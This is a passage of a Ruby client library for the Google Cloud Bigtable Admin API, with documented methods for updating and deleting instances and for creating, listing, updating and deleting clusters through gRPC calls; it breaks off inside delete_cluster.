# Pass arguments to `update_instance` via keyword arguments. Note that at
# least one keyword argument is required. To specify no parameters, or to keep all
# the default parameter values, pass an empty Hash as a request object (see above).
#
# @param name [::String]
# The unique name of the instance. Values are of the form
# `projects/{project}/instances/[a-z][a-z0-9\\-]+[a-z0-9]`.
# @param display_name [::String]
# Required. The descriptive name for this instance as it appears in UIs.
# Can be changed at any time, but should be kept globally unique
# to avoid confusion.
# @param state [::Google::Cloud::Bigtable::Admin::V2::Instance::State]
# (`OutputOnly`)
# The current state of the instance.
# @param type [::Google::Cloud::Bigtable::Admin::V2::Instance::Type]
# The type of the instance. Defaults to `PRODUCTION`.
# @param labels [::Hash{::String => ::String}]
# Labels are a flexible and lightweight mechanism for organizing cloud
# resources into groups that reflect a customer's organizational needs and
# deployment strategies. They can be used to filter resources and aggregate
# metrics.
#
# * Label keys must be between 1 and 63 characters long and must conform to
# the regular expression: `[\p{Ll}\p{Lo}][\p{Ll}\p{Lo}\p{N}_-]{0,62}`.
# * Label values must be between 0 and 63 characters long and must conform to
# the regular expression: `[\p{Ll}\p{Lo}\p{N}_-]{0,63}`.
# * No more than 64 labels can be associated with a given resource.
# * Keys and values must both be under 128 bytes.
#
# @yield [response, operation] Access the result along with the RPC operation
# @yieldparam response [::Google::Cloud::Bigtable::Admin::V2::Instance]
# @yieldparam operation [::GRPC::ActiveCall::Operation]
#
# @return [::Google::Cloud::Bigtable::Admin::V2::Instance]
#
# @raise [::Google::Cloud::Error] if the RPC is aborted.
#
# @example Basic example
# require "google/cloud/bigtable/admin/v2"
#
# # Create a client object. The client can be reused for multiple calls.
# client = Google::Cloud::Bigtable::Admin::V2::BigtableInstanceAdmin::Client.new
#
# # Create a request. To set request fields, pass in keyword arguments.
# request = Google::Cloud::Bigtable::Admin::V2::Instance.new
#
# # Call the update_instance method.
# result = client.update_instance request
#
# # The returned object is of type Google::Cloud::Bigtable::Admin::V2::Instance.
# p result
#
# Updates an instance's display name and type (the request message is the
# Instance itself). See the YARD docs above for argument details.
def update_instance request, options = nil
  raise ::ArgumentError, "request must be provided" if request.nil?

  request = ::Gapic::Protobuf.coerce request,
                                     to: ::Google::Cloud::Bigtable::Admin::V2::Instance

  # Normalize a Hash (or nil) into a CallOptions object.
  options = ::Gapic::CallOptions.new(**options.to_h) if options.respond_to? :to_h

  # Start from the per-RPC metadata, then layer on the standard headers.
  call_metadata = @config.rpcs.update_instance.metadata.to_h
  call_metadata[:"x-goog-api-client"] ||= ::Gapic::Headers.x_goog_api_client \
    lib_name: @config.lib_name, lib_version: @config.lib_version,
    gapic_version: ::Google::Cloud::Bigtable::Admin::V2::VERSION
  call_metadata[:"x-goog-user-project"] = @quota_project_id if @quota_project_id

  # Routing header derived from the request's resource name.
  routing_params = {}
  routing_params["name"] = request.name if request.name
  call_metadata[:"x-goog-request-params"] ||= routing_params.map { |k, v| "#{k}=#{v}" }.join("&")

  # RPC-specific defaults take precedence over client-wide defaults.
  options.apply_defaults timeout: @config.rpcs.update_instance.timeout,
                         metadata: call_metadata,
                         retry_policy: @config.rpcs.update_instance.retry_policy
  options.apply_defaults timeout: @config.timeout,
                         metadata: @config.metadata,
                         retry_policy: @config.retry_policy

  @bigtable_instance_admin_stub.call_rpc :update_instance, request, options: options do |response, operation|
    yield response, operation if block_given?
    return response
  end
rescue ::GRPC::BadStatus => e
  raise ::Google::Cloud::Error.from_error(e)
end
##
# Partially updates an instance within a project. This method can modify all
# fields of an Instance and is the preferred way to update an Instance.
#
# @overload partial_update_instance(request, options = nil)
# Pass arguments to `partial_update_instance` via a request object, either of type
# {::Google::Cloud::Bigtable::Admin::V2::PartialUpdateInstanceRequest} or an equivalent Hash.
#
# @param request [::Google::Cloud::Bigtable::Admin::V2::PartialUpdateInstanceRequest, ::Hash]
# A request object representing the call parameters. Required. To specify no
# parameters, or to keep all the default parameter values, pass an empty Hash.
# @param options [::Gapic::CallOptions, ::Hash]
# Overrides the default settings for this call, e.g, timeout, retries, etc. Optional.
#
# @overload partial_update_instance(instance: nil, update_mask: nil)
# Pass arguments to `partial_update_instance` via keyword arguments. Note that at
# least one keyword argument is required. To specify no parameters, or to keep all
# the default parameter values, pass an empty Hash as a request object (see above).
#
# @param instance [::Google::Cloud::Bigtable::Admin::V2::Instance, ::Hash]
# Required. The Instance which will (partially) replace the current value.
# @param update_mask [::Google::Protobuf::FieldMask, ::Hash]
# Required. The subset of Instance fields which should be replaced.
# Must be explicitly set.
#
# @yield [response, operation] Access the result along with the RPC operation
# @yieldparam response [::Gapic::Operation]
# @yieldparam operation [::GRPC::ActiveCall::Operation]
#
# @return [::Gapic::Operation]
#
# @raise [::Google::Cloud::Error] if the RPC is aborted.
#
# @example Basic example
# require "google/cloud/bigtable/admin/v2"
#
# # Create a client object. The client can be reused for multiple calls.
# client = Google::Cloud::Bigtable::Admin::V2::BigtableInstanceAdmin::Client.new
#
# # Create a request. To set request fields, pass in keyword arguments.
# request = Google::Cloud::Bigtable::Admin::V2::PartialUpdateInstanceRequest.new
#
# # Call the partial_update_instance method.
# result = client.partial_update_instance request
#
# # The returned object is of type Gapic::Operation. You can use this
# # object to check the status of an operation, cancel it, or wait
# # for results. Here is how to block until completion:
# result.wait_until_done! timeout: 60
# if result.response?
# p result.response
# else
# puts "Error!"
# end
#
# Partially updates an instance (field-mask based); preferred over
# update_instance. Returns a ::Gapic::Operation wrapping the server-side
# long-running operation.
def partial_update_instance request, options = nil
  raise ::ArgumentError, "request must be provided" if request.nil?

  request = ::Gapic::Protobuf.coerce request,
                                     to: ::Google::Cloud::Bigtable::Admin::V2::PartialUpdateInstanceRequest

  # Normalize a Hash (or nil) into a CallOptions object.
  options = ::Gapic::CallOptions.new(**options.to_h) if options.respond_to? :to_h

  # Start from the per-RPC metadata, then layer on the standard headers.
  call_metadata = @config.rpcs.partial_update_instance.metadata.to_h
  call_metadata[:"x-goog-api-client"] ||= ::Gapic::Headers.x_goog_api_client \
    lib_name: @config.lib_name, lib_version: @config.lib_version,
    gapic_version: ::Google::Cloud::Bigtable::Admin::V2::VERSION
  call_metadata[:"x-goog-user-project"] = @quota_project_id if @quota_project_id

  # Routing header derived from the nested instance's resource name.
  routing_params = {}
  routing_params["instance.name"] = request.instance.name if request.instance&.name
  call_metadata[:"x-goog-request-params"] ||= routing_params.map { |k, v| "#{k}=#{v}" }.join("&")

  # RPC-specific defaults take precedence over client-wide defaults.
  options.apply_defaults timeout: @config.rpcs.partial_update_instance.timeout,
                         metadata: call_metadata,
                         retry_policy: @config.rpcs.partial_update_instance.retry_policy
  options.apply_defaults timeout: @config.timeout,
                         metadata: @config.metadata,
                         retry_policy: @config.retry_policy

  @bigtable_instance_admin_stub.call_rpc :partial_update_instance, request, options: options do |response, operation|
    # Wrap the raw long-running operation so callers can poll/cancel it.
    response = ::Gapic::Operation.new response, @operations_client, options: options
    yield response, operation if block_given?
    return response
  end
rescue ::GRPC::BadStatus => e
  raise ::Google::Cloud::Error.from_error(e)
end
##
# Delete an instance from a project.
#
# @overload delete_instance(request, options = nil)
# Pass arguments to `delete_instance` via a request object, either of type
# {::Google::Cloud::Bigtable::Admin::V2::DeleteInstanceRequest} or an equivalent Hash.
#
# @param request [::Google::Cloud::Bigtable::Admin::V2::DeleteInstanceRequest, ::Hash]
# A request object representing the call parameters. Required. To specify no
# parameters, or to keep all the default parameter values, pass an empty Hash.
# @param options [::Gapic::CallOptions, ::Hash]
# Overrides the default settings for this call, e.g, timeout, retries, etc. Optional.
#
# @overload delete_instance(name: nil)
# Pass arguments to `delete_instance` via keyword arguments. Note that at
# least one keyword argument is required. To specify no parameters, or to keep all
# the default parameter values, pass an empty Hash as a request object (see above).
#
# @param name [::String]
# Required. The unique name of the instance to be deleted.
# Values are of the form `projects/{project}/instances/{instance}`.
#
# @yield [response, operation] Access the result along with the RPC operation
# @yieldparam response [::Google::Protobuf::Empty]
# @yieldparam operation [::GRPC::ActiveCall::Operation]
#
# @return [::Google::Protobuf::Empty]
#
# @raise [::Google::Cloud::Error] if the RPC is aborted.
#
# @example Basic example
# require "google/cloud/bigtable/admin/v2"
#
# # Create a client object. The client can be reused for multiple calls.
# client = Google::Cloud::Bigtable::Admin::V2::BigtableInstanceAdmin::Client.new
#
# # Create a request. To set request fields, pass in keyword arguments.
# request = Google::Cloud::Bigtable::Admin::V2::DeleteInstanceRequest.new
#
# # Call the delete_instance method.
# result = client.delete_instance request
#
# # The returned object is of type Google::Protobuf::Empty.
# p result
#
# Deletes an instance from a project. See the YARD docs above for
# argument details.
def delete_instance request, options = nil
  raise ::ArgumentError, "request must be provided" if request.nil?

  request = ::Gapic::Protobuf.coerce request,
                                     to: ::Google::Cloud::Bigtable::Admin::V2::DeleteInstanceRequest

  # Normalize a Hash (or nil) into a CallOptions object.
  options = ::Gapic::CallOptions.new(**options.to_h) if options.respond_to? :to_h

  # Start from the per-RPC metadata, then layer on the standard headers.
  call_metadata = @config.rpcs.delete_instance.metadata.to_h
  call_metadata[:"x-goog-api-client"] ||= ::Gapic::Headers.x_goog_api_client \
    lib_name: @config.lib_name, lib_version: @config.lib_version,
    gapic_version: ::Google::Cloud::Bigtable::Admin::V2::VERSION
  call_metadata[:"x-goog-user-project"] = @quota_project_id if @quota_project_id

  # Routing header derived from the request's resource name.
  routing_params = {}
  routing_params["name"] = request.name if request.name
  call_metadata[:"x-goog-request-params"] ||= routing_params.map { |k, v| "#{k}=#{v}" }.join("&")

  # RPC-specific defaults take precedence over client-wide defaults.
  options.apply_defaults timeout: @config.rpcs.delete_instance.timeout,
                         metadata: call_metadata,
                         retry_policy: @config.rpcs.delete_instance.retry_policy
  options.apply_defaults timeout: @config.timeout,
                         metadata: @config.metadata,
                         retry_policy: @config.retry_policy

  @bigtable_instance_admin_stub.call_rpc :delete_instance, request, options: options do |response, operation|
    yield response, operation if block_given?
    return response
  end
rescue ::GRPC::BadStatus => e
  raise ::Google::Cloud::Error.from_error(e)
end
##
# Creates a cluster within an instance.
#
# Note that exactly one of Cluster.serve_nodes and
# Cluster.cluster_config.cluster_autoscaling_config can be set. If
# serve_nodes is set to non-zero, then the cluster is manually scaled. If
# cluster_config.cluster_autoscaling_config is non-empty, then autoscaling is
# enabled.
#
# @overload create_cluster(request, options = nil)
# Pass arguments to `create_cluster` via a request object, either of type
# {::Google::Cloud::Bigtable::Admin::V2::CreateClusterRequest} or an equivalent Hash.
#
# @param request [::Google::Cloud::Bigtable::Admin::V2::CreateClusterRequest, ::Hash]
# A request object representing the call parameters. Required. To specify no
# parameters, or to keep all the default parameter values, pass an empty Hash.
# @param options [::Gapic::CallOptions, ::Hash]
# Overrides the default settings for this call, e.g, timeout, retries, etc. Optional.
#
# @overload create_cluster(parent: nil, cluster_id: nil, cluster: nil)
# Pass arguments to `create_cluster` via keyword arguments. Note that at
# least one keyword argument is required. To specify no parameters, or to keep all
# the default parameter values, pass an empty Hash as a request object (see above).
#
# @param parent [::String]
# Required. The unique name of the instance in which to create the new cluster.
# Values are of the form
# `projects/{project}/instances/{instance}`.
# @param cluster_id [::String]
# Required. The ID to be used when referring to the new cluster within its instance,
# e.g., just `mycluster` rather than
# `projects/myproject/instances/myinstance/clusters/mycluster`.
# @param cluster [::Google::Cloud::Bigtable::Admin::V2::Cluster, ::Hash]
# Required. The cluster to be created.
# Fields marked `OutputOnly` must be left blank.
#
# @yield [response, operation] Access the result along with the RPC operation
# @yieldparam response [::Gapic::Operation]
# @yieldparam operation [::GRPC::ActiveCall::Operation]
#
# @return [::Gapic::Operation]
#
# @raise [::Google::Cloud::Error] if the RPC is aborted.
#
# @example Basic example
# require "google/cloud/bigtable/admin/v2"
#
# # Create a client object. The client can be reused for multiple calls.
# client = Google::Cloud::Bigtable::Admin::V2::BigtableInstanceAdmin::Client.new
#
# # Create a request. To set request fields, pass in keyword arguments.
# request = Google::Cloud::Bigtable::Admin::V2::CreateClusterRequest.new
#
# # Call the create_cluster method.
# result = client.create_cluster request
#
# # The returned object is of type Gapic::Operation. You can use this
# # object to check the status of an operation, cancel it, or wait
# # for results. Here is how to block until completion:
# result.wait_until_done! timeout: 60
# if result.response?
# p result.response
# else
# puts "Error!"
# end
#
# Starts creation of a cluster within an instance. Returns a
# ::Gapic::Operation wrapping the server-side long-running operation.
def create_cluster request, options = nil
  raise ::ArgumentError, "request must be provided" if request.nil?

  request = ::Gapic::Protobuf.coerce request,
                                     to: ::Google::Cloud::Bigtable::Admin::V2::CreateClusterRequest

  # Normalize a Hash (or nil) into a CallOptions object.
  options = ::Gapic::CallOptions.new(**options.to_h) if options.respond_to? :to_h

  # Start from the per-RPC metadata, then layer on the standard headers.
  call_metadata = @config.rpcs.create_cluster.metadata.to_h
  call_metadata[:"x-goog-api-client"] ||= ::Gapic::Headers.x_goog_api_client \
    lib_name: @config.lib_name, lib_version: @config.lib_version,
    gapic_version: ::Google::Cloud::Bigtable::Admin::V2::VERSION
  call_metadata[:"x-goog-user-project"] = @quota_project_id if @quota_project_id

  # Routing header derived from the request's resource name.
  routing_params = {}
  routing_params["parent"] = request.parent if request.parent
  call_metadata[:"x-goog-request-params"] ||= routing_params.map { |k, v| "#{k}=#{v}" }.join("&")

  # RPC-specific defaults take precedence over client-wide defaults.
  options.apply_defaults timeout: @config.rpcs.create_cluster.timeout,
                         metadata: call_metadata,
                         retry_policy: @config.rpcs.create_cluster.retry_policy
  options.apply_defaults timeout: @config.timeout,
                         metadata: @config.metadata,
                         retry_policy: @config.retry_policy

  @bigtable_instance_admin_stub.call_rpc :create_cluster, request, options: options do |response, operation|
    # Wrap the raw long-running operation so callers can poll/cancel it.
    response = ::Gapic::Operation.new response, @operations_client, options: options
    yield response, operation if block_given?
    return response
  end
rescue ::GRPC::BadStatus => e
  raise ::Google::Cloud::Error.from_error(e)
end
##
# Gets information about a cluster.
#
# @overload get_cluster(request, options = nil)
# Pass arguments to `get_cluster` via a request object, either of type
# {::Google::Cloud::Bigtable::Admin::V2::GetClusterRequest} or an equivalent Hash.
#
# @param request [::Google::Cloud::Bigtable::Admin::V2::GetClusterRequest, ::Hash]
# A request object representing the call parameters. Required. To specify no
# parameters, or to keep all the default parameter values, pass an empty Hash.
# @param options [::Gapic::CallOptions, ::Hash]
# Overrides the default settings for this call, e.g, timeout, retries, etc. Optional.
#
# @overload get_cluster(name: nil)
# Pass arguments to `get_cluster` via keyword arguments. Note that at
# least one keyword argument is required. To specify no parameters, or to keep all
# the default parameter values, pass an empty Hash as a request object (see above).
#
# @param name [::String]
# Required. The unique name of the requested cluster. Values are of the form
# `projects/{project}/instances/{instance}/clusters/{cluster}`.
#
# @yield [response, operation] Access the result along with the RPC operation
# @yieldparam response [::Google::Cloud::Bigtable::Admin::V2::Cluster]
# @yieldparam operation [::GRPC::ActiveCall::Operation]
#
# @return [::Google::Cloud::Bigtable::Admin::V2::Cluster]
#
# @raise [::Google::Cloud::Error] if the RPC is aborted.
#
# @example Basic example
# require "google/cloud/bigtable/admin/v2"
#
# # Create a client object. The client can be reused for multiple calls.
# client = Google::Cloud::Bigtable::Admin::V2::BigtableInstanceAdmin::Client.new
#
# # Create a request. To set request fields, pass in keyword arguments.
# request = Google::Cloud::Bigtable::Admin::V2::GetClusterRequest.new
#
# # Call the get_cluster method.
# result = client.get_cluster request
#
# # The returned object is of type Google::Cloud::Bigtable::Admin::V2::Cluster.
# p result
#
def get_cluster request, options = nil
raise ::ArgumentError, "request must be provided" if request.nil?
request = ::Gapic::Protobuf.coerce request, to: ::Google::Cloud::Bigtable::Admin::V2::GetClusterRequest
# Converts hash and nil to an options object
options = ::Gapic::CallOptions.new(**options.to_h) if options.respond_to? :to_h
# Customize the options with defaults
metadata = @config.rpcs.get_cluster.metadata.to_h
# Set x-goog-api-client and x-goog-user-project headers
metadata[:"x-goog-api-client"] ||= ::Gapic::Headers.x_goog_api_client \
lib_name: @config.lib_name, lib_version: @config.lib_version,
gapic_version: ::Google::Cloud::Bigtable::Admin::V2::VERSION
metadata[:"x-goog-user-project"] = @quota_project_id if @quota_project_id
header_params = {}
if request.name
header_params["name"] = request.name
end
request_params_header = header_params.map { |k, v| "#{k}=#{v}" }.join("&")
metadata[:"x-goog-request-params"] ||= request_params_header
options.apply_defaults timeout: @config.rpcs.get_cluster.timeout,
metadata: metadata,
retry_policy: @config.rpcs.get_cluster.retry_policy
options.apply_defaults timeout: @config.timeout,
metadata: @config.metadata,
retry_policy: @config.retry_policy
@bigtable_instance_admin_stub.call_rpc :get_cluster, request, options: options do |response, operation|
yield response, operation if block_given?
return response
end
rescue ::GRPC::BadStatus => e
raise ::Google::Cloud::Error.from_error(e)
end
##
# Lists information about clusters in an instance.
#
# @overload list_clusters(request, options = nil)
# Pass arguments to `list_clusters` via a request object, either of type
# {::Google::Cloud::Bigtable::Admin::V2::ListClustersRequest} or an equivalent Hash.
#
# @param request [::Google::Cloud::Bigtable::Admin::V2::ListClustersRequest, ::Hash]
# A request object representing the call parameters. Required. To specify no
# parameters, or to keep all the default parameter values, pass an empty Hash.
# @param options [::Gapic::CallOptions, ::Hash]
# Overrides the default settings for this call, e.g, timeout, retries, etc. Optional.
#
# @overload list_clusters(parent: nil, page_token: nil)
# Pass arguments to `list_clusters` via keyword arguments. Note that at
# least one keyword argument is required. To specify no parameters, or to keep all
# the default parameter values, pass an empty Hash as a request object (see above).
#
# @param parent [::String]
# Required. The unique name of the instance for which a list of clusters is requested.
# Values are of the form `projects/{project}/instances/{instance}`.
# Use `{instance} = '-'` to list Clusters for all Instances in a project,
# e.g., `projects/myproject/instances/-`.
# @param page_token [::String]
# DEPRECATED: This field is unused and ignored.
#
# @yield [response, operation] Access the result along with the RPC operation
# @yieldparam response [::Google::Cloud::Bigtable::Admin::V2::ListClustersResponse]
# @yieldparam operation [::GRPC::ActiveCall::Operation]
#
# @return [::Google::Cloud::Bigtable::Admin::V2::ListClustersResponse]
#
# @raise [::Google::Cloud::Error] if the RPC is aborted.
#
# @example Basic example
# require "google/cloud/bigtable/admin/v2"
#
# # Create a client object. The client can be reused for multiple calls.
# client = Google::Cloud::Bigtable::Admin::V2::BigtableInstanceAdmin::Client.new
#
# # Create a request. To set request fields, pass in keyword arguments.
# request = Google::Cloud::Bigtable::Admin::V2::ListClustersRequest.new
#
# # Call the list_clusters method.
# result = client.list_clusters request
#
# # The returned object is of type Google::Cloud::Bigtable::Admin::V2::ListClustersResponse.
# p result
#
def list_clusters request, options = nil
raise ::ArgumentError, "request must be provided" if request.nil?
request = ::Gapic::Protobuf.coerce request, to: ::Google::Cloud::Bigtable::Admin::V2::ListClustersRequest
# Converts hash and nil to an options object
options = ::Gapic::CallOptions.new(**options.to_h) if options.respond_to? :to_h
# Customize the options with defaults
metadata = @config.rpcs.list_clusters.metadata.to_h
# Set x-goog-api-client and x-goog-user-project headers
metadata[:"x-goog-api-client"] ||= ::Gapic::Headers.x_goog_api_client \
lib_name: @config.lib_name, lib_version: @config.lib_version,
gapic_version: ::Google::Cloud::Bigtable::Admin::V2::VERSION
metadata[:"x-goog-user-project"] = @quota_project_id if @quota_project_id
header_params = {}
if request.parent
header_params["parent"] = request.parent
end
request_params_header = header_params.map { |k, v| "#{k}=#{v}" }.join("&")
metadata[:"x-goog-request-params"] ||= request_params_header
options.apply_defaults timeout: @config.rpcs.list_clusters.timeout,
metadata: metadata,
retry_policy: @config.rpcs.list_clusters.retry_policy
options.apply_defaults timeout: @config.timeout,
metadata: @config.metadata,
retry_policy: @config.retry_policy
@bigtable_instance_admin_stub.call_rpc :list_clusters, request, options: options do |response, operation|
yield response, operation if block_given?
return response
end
rescue ::GRPC::BadStatus => e
raise ::Google::Cloud::Error.from_error(e)
end
##
# Updates a cluster within an instance.
#
# Note that UpdateCluster does not support updating
# cluster_config.cluster_autoscaling_config. In order to update it, you
# must use PartialUpdateCluster.
#
# @overload update_cluster(request, options = nil)
# Pass arguments to `update_cluster` via a request object, either of type
# {::Google::Cloud::Bigtable::Admin::V2::Cluster} or an equivalent Hash.
#
# @param request [::Google::Cloud::Bigtable::Admin::V2::Cluster, ::Hash]
# A request object representing the call parameters. Required. To specify no
# parameters, or to keep all the default parameter values, pass an empty Hash.
# @param options [::Gapic::CallOptions, ::Hash]
# Overrides the default settings for this call, e.g, timeout, retries, etc. Optional.
#
# @overload update_cluster(name: nil, location: nil, serve_nodes: nil, cluster_config: nil, default_storage_type: nil, encryption_config: nil)
# Pass arguments to `update_cluster` via keyword arguments. Note that at
# least one keyword argument is required. To specify no parameters, or to keep all
# the default parameter values, pass an empty Hash as a request object (see above).
#
# @param name [::String]
# The unique name of the cluster. Values are of the form
# `projects/{project}/instances/{instance}/clusters/[a-z][-a-z0-9]*`.
# @param location [::String]
# Immutable. The location where this cluster's nodes and storage reside. For best
# performance, clients should be located as close as possible to this
# cluster. Currently only zones are supported, so values should be of the
# form `projects/{project}/locations/{zone}`.
# @param serve_nodes [::Integer]
# The number of nodes allocated to this cluster. More nodes enable higher
# throughput and more consistent performance.
# @param cluster_config [::Google::Cloud::Bigtable::Admin::V2::Cluster::ClusterConfig, ::Hash]
# Configuration for this cluster.
# @param default_storage_type [::Google::Cloud::Bigtable::Admin::V2::StorageType]
# Immutable. The type of storage used by this cluster to serve its
# parent instance's tables, unless explicitly overridden.
# @param encryption_config [::Google::Cloud::Bigtable::Admin::V2::Cluster::EncryptionConfig, ::Hash]
# Immutable. The encryption configuration for CMEK-protected clusters.
#
# @yield [response, operation] Access the result along with the RPC operation
# @yieldparam response [::Gapic::Operation]
# @yieldparam operation [::GRPC::ActiveCall::Operation]
#
# @return [::Gapic::Operation]
#
# @raise [::Google::Cloud::Error] if the RPC is aborted.
#
# @example Basic example
# require "google/cloud/bigtable/admin/v2"
#
# # Create a client object. The client can be reused for multiple calls.
# client = Google::Cloud::Bigtable::Admin::V2::BigtableInstanceAdmin::Client.new
#
# # Create a request. To set request fields, pass in keyword arguments.
# request = Google::Cloud::Bigtable::Admin::V2::Cluster.new
#
# # Call the update_cluster method.
# result = client.update_cluster request
#
# # The returned object is of type Gapic::Operation. You can use this
# # object to check the status of an operation, cancel it, or wait
# # for results. Here is how to block until completion:
# result.wait_until_done! timeout: 60
# if result.response?
# p result.response
# else
# puts "Error!"
# end
#
def update_cluster request, options = nil
raise ::ArgumentError, "request must be provided" if request.nil?
request = ::Gapic::Protobuf.coerce request, to: ::Google::Cloud::Bigtable::Admin::V2::Cluster
# Converts hash and nil to an options object
options = ::Gapic::CallOptions.new(**options.to_h) if options.respond_to? :to_h
# Customize the options with defaults
metadata = @config.rpcs.update_cluster.metadata.to_h
# Set x-goog-api-client and x-goog-user-project headers
metadata[:"x-goog-api-client"] ||= ::Gapic::Headers.x_goog_api_client \
lib_name: @config.lib_name, lib_version: @config.lib_version,
gapic_version: ::Google::Cloud::Bigtable::Admin::V2::VERSION
metadata[:"x-goog-user-project"] = @quota_project_id if @quota_project_id
header_params = {}
if request.name
header_params["name"] = request.name
end
request_params_header = header_params.map { |k, v| "#{k}=#{v}" }.join("&")
metadata[:"x-goog-request-params"] ||= request_params_header
options.apply_defaults timeout: @config.rpcs.update_cluster.timeout,
metadata: metadata,
retry_policy: @config.rpcs.update_cluster.retry_policy
options.apply_defaults timeout: @config.timeout,
metadata: @config.metadata,
retry_policy: @config.retry_policy
@bigtable_instance_admin_stub.call_rpc :update_cluster, request, options: options do |response, operation|
response = ::Gapic::Operation.new response, @operations_client, options: options
yield response, operation if block_given?
return response
end
rescue ::GRPC::BadStatus => e
raise ::Google::Cloud::Error.from_error(e)
end
##
# Partially updates a cluster within a project. This method is the preferred
# way to update a Cluster.
#
# To enable and update autoscaling, set
# cluster_config.cluster_autoscaling_config. When autoscaling is enabled,
# serve_nodes is treated as an OUTPUT_ONLY field, meaning that updates to it
# are ignored. Note that an update cannot simultaneously set serve_nodes to
# non-zero and cluster_config.cluster_autoscaling_config to non-empty, and
# also specify both in the update_mask.
#
# To disable autoscaling, clear cluster_config.cluster_autoscaling_config,
# and explicitly set a serve_node count via the update_mask.
#
# @overload partial_update_cluster(request, options = nil)
# Pass arguments to `partial_update_cluster` via a request object, either of type
# {::Google::Cloud::Bigtable::Admin::V2::PartialUpdateClusterRequest} or an equivalent Hash.
#
# @param request [::Google::Cloud::Bigtable::Admin::V2::PartialUpdateClusterRequest, ::Hash]
# A request object representing the call parameters. Required. To specify no
# parameters, or to keep all the default parameter values, pass an empty Hash.
# @param options [::Gapic::CallOptions, ::Hash]
# Overrides the default settings for this call, e.g, timeout, retries, etc. Optional.
#
# @overload partial_update_cluster(cluster: nil, update_mask: nil)
# Pass arguments to `partial_update_cluster` via keyword arguments. Note that at
# least one keyword argument is required. To specify no parameters, or to keep all
# the default parameter values, pass an empty Hash as a request object (see above).
#
# @param cluster [::Google::Cloud::Bigtable::Admin::V2::Cluster, ::Hash]
# Required. The Cluster which contains the partial updates to be applied, subject to
# the update_mask.
# @param update_mask [::Google::Protobuf::FieldMask, ::Hash]
# Required. The subset of Cluster fields which should be replaced.
#
# @yield [response, operation] Access the result along with the RPC operation
# @yieldparam response [::Gapic::Operation]
# @yieldparam operation [::GRPC::ActiveCall::Operation]
#
# @return [::Gapic::Operation]
#
# @raise [::Google::Cloud::Error] if the RPC is aborted.
#
# @example Basic example
# require "google/cloud/bigtable/admin/v2"
#
# # Create a client object. The client can be reused for multiple calls.
# client = Google::Cloud::Bigtable::Admin::V2::BigtableInstanceAdmin::Client.new
#
# # Create a request. To set request fields, pass in keyword arguments.
# request = Google::Cloud::Bigtable::Admin::V2::PartialUpdateClusterRequest.new
#
# # Call the partial_update_cluster method.
# result = client.partial_update_cluster request
#
# # The returned object is of type Gapic::Operation. You can use this
# # object to check the status of an operation, cancel it, or wait
# # for results. Here is how to block until completion:
# result.wait_until_done! timeout: 60
# if result.response?
# p result.response
# else
# puts "Error!"
# end
#
def partial_update_cluster request, options = nil
raise ::ArgumentError, "request must be provided" if request.nil?
request = ::Gapic::Protobuf.coerce request, to: ::Google::Cloud::Bigtable::Admin::V2::PartialUpdateClusterRequest
# Converts hash and nil to an options object
options = ::Gapic::CallOptions.new(**options.to_h) if options.respond_to? :to_h
# Customize the options with defaults
metadata = @config.rpcs.partial_update_cluster.metadata.to_h
# Set x-goog-api-client and x-goog-user-project headers
metadata[:"x-goog-api-client"] ||= ::Gapic::Headers.x_goog_api_client \
lib_name: @config.lib_name, lib_version: @config.lib_version,
gapic_version: ::Google::Cloud::Bigtable::Admin::V2::VERSION
metadata[:"x-goog-user-project"] = @quota_project_id if @quota_project_id
header_params = {}
if request.cluster&.name
header_params["cluster.name"] = request.cluster.name
end
request_params_header = header_params.map { |k, v| "#{k}=#{v}" }.join("&")
metadata[:"x-goog-request-params"] ||= request_params_header
options.apply_defaults timeout: @config.rpcs.partial_update_cluster.timeout,
metadata: metadata,
retry_policy: @config.rpcs.partial_update_cluster.retry_policy
options.apply_defaults timeout: @config.timeout,
metadata: @config.metadata,
retry_policy: @config.retry_policy
@bigtable_instance_admin_stub.call_rpc :partial_update_cluster, request, options: options do |response, operation|
response = ::Gapic::Operation.new response, @operations_client, options: options
yield response, operation if block_given?
return response
end
rescue ::GRPC::BadStatus => e
raise ::Google::Cloud::Error.from_error(e)
end
##
# Deletes a cluster from an instance.
#
# @overload delete_cluster(request, options = nil)
# Pass arguments to `delete_cluster` via a request object, either of type
# {::Google::Cloud::Bigtable::Admin::V2::DeleteClusterRequest} or an equivalent Hash.
#
# @param request [::Google::Cloud::Bigtable::Admin::V2::DeleteClusterRequest, ::Hash]
# A request object representing the call parameters. Required. To specify no
# parameters, or to keep all the default parameter values, pass an empty Hash.
# @param options [::Gapic::CallOptions, ::Hash]
# Overrides the default settings for this call, e.g, timeout, retries, etc. Optional.
#
# @overload delete_cluster(name: nil)
# Pass arguments to `delete_cluster` via keyword arguments. Note that at
# least one keyword argument is required. To specify no parameters, or to keep all
# the default parameter values, pass an empty Hash as a request object (see above).
#
# @param name [::String]
# Required. The unique name of the cluster to be deleted. Values are of the form
# `projects/{project}/instances/{instance}/clusters/{cluster}`.
#
# @yield [response, operation] Access the result along with the RPC operation
# @yieldparam response [::Google::Protobuf::Empty]
# @yieldparam operation [::GRPC::ActiveCall::Operation]
#
# @return [::Google::Protobuf::Empty]
#
# @raise [::Google::Cloud::Error] if the RPC is aborted.
#
# @example Basic example
# require "google/cloud/bigtable/admin/v2"
#
# # Create a client object. The client can be reused for multiple calls.
# client = Google::Cloud::Bigtable::Admin::V2::BigtableInstanceAdmin::Client.new
#
# # Create a request. To set request fields, pass in keyword arguments.
# request = Google::Cloud::Bigtable::Admin::V2::DeleteClusterRequest.new
#
# # Call the delete_cluster method.
# result = client.delete_cluster request
#
# # The returned object is of type Google::Protobuf::Empty.
# p result
#
def delete_cluster request, options = nil
raise ::ArgumentError, "request must be provided" if request.nil?
request = ::Gapic::Protobuf.coerce request, to: ::Google::Cloud::Bigtable::Admin::V2::DeleteClusterRequest
# Converts hash and nil to an options object
options = ::Gapic::CallOptions.new(**options.to_h) if options.respond_to? :to_h
# Customize the options with defaults
metadata = @config.rpcs.delete_cluster.metadata.to_h
# Set x-goog-api-client and x-goog-user-project headers
metadata[:"x-goog-api-client"] ||= ::Gapic::Headers.x_goog_api_client \
lib_name: @config.lib_name, lib_version: @config.lib_version,
gapic_version: ::Google::Cloud::Bigtable::Admin::V2::VERSION
metadata[:"x-goog-user-project"] = @quota_project_id if @quota_project_id
header_params = {}
if request.name
header_params["name"] = request.name
end
request_params_header = header_params.map { |k, v| "#{k}=#{v}" }.join("&")
metadata[:"x-goog-request-params"] ||= request_params_header
options.apply_defaults timeout: @config.rpcs.delete_cluster.timeout,
metadata: metadata,
retry_policy: @config.rpcs.delete_cluster.retry_policy
options.apply_defaults timeout: @config.timeout,
